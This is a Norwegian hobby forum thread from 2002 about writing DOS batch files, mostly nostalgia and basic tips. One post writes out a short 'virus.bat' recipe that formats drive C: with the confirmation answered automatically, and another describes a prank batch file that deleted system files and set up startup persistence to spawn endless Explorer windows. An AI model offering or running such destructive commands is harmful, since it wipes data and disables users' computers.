Dr.X Skrevet 22. august 2002 Del Skrevet 22. august 2002 Hvordan er det programerer slike "programmer" da? Trenger man et spesiellt code program? Eller hvordan får du laget .bat fila? Dr.X Lenke til kommentar
Dagger Skrevet 22. august 2002 Forfatter Del Skrevet 22. august 2002 EDIT eller notepad og renamer i dos Lenke til kommentar
Dr.X Skrevet 22. august 2002 Del Skrevet 22. august 2002 Sa da er det bare å skrive et sånnt lite morsomt program og lagre det som .bat da eller? Tøft! Dr.X Lenke til kommentar
Dan Hansen Skrevet 22. august 2002 Del Skrevet 22. august 2002 I "gamle dager" gjorde vi nesten alt i DOS. Man kunne sette opp batch-rutiner som koblet til og fra nettverksstasjoner, delte printere, sikkerhetskopierte, slettet filer/kataloger, sjekket harddisker, installerte programmer, skrev ut rapporter, osv osv osv ... og det kræsjet aldri noensinne anderledes man hadde skrevet noe feil - men da virket det som oftest ikke i det hele tatt. *sukk* savner MS-DOS jeg ... Lenke til kommentar
Jimmy Pop Skrevet 22. august 2002 Del Skrevet 22. august 2002 Dos prompt: copy con virus.bat format c: < j (F6) copy con j j (F6) virus Det er en måte... Lenke til kommentar
norpheus Skrevet 22. august 2002 Del Skrevet 22. august 2002 Huske rikke helt åssen den var, men den batch-fila jeg lagde for noen år siden sletta alle .vxd, .dll, .exe - filer i windows katalogen og sletta IO.sys i root. Fikk til å lage en batch-fil som installerte et "virus" som åpnet explorere i all evighet. Fikk til slik at når en kjørte en batch fil så laga den en ny autoexec.bat fil, og når da maskinen starta, la snarveien til "viruset" seg inn i oppstarts-delen av registeret, og kopierte tilbake den originale autoexec.bat fila. litt kjedelig å oppleve at explorer åner seg i xxxx tusen exemplarer hver gang du starter meskinen. Er jo ingen sak å fjerne, men de som ikke kan så mye sliter litt der.. hehe.. Lenke til kommentar
EC Skrevet 23. august 2002 Del Skrevet 23. august 2002 Feilpostet. Flyttes, men stenges ikke denne gang! -moderator yummy- Lenke til kommentar
Jimmy Pop Skrevet 23. august 2002 Del Skrevet 23. august 2002 Trodde alle poster som ble flyttet til "Feilposter ble stengt automatisk, jeg... Men det var da kult! Lenke til kommentar
aurstad Skrevet 25. august 2002 Del Skrevet 25. august 2002 det mest snedig jeg brukte slike batch-filer til var jo de forskjellige boot-up måtene man kunne lage. Feks med lydkort/cd-rom, kommandolinje osv osv.. snedige saker dette her.. Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå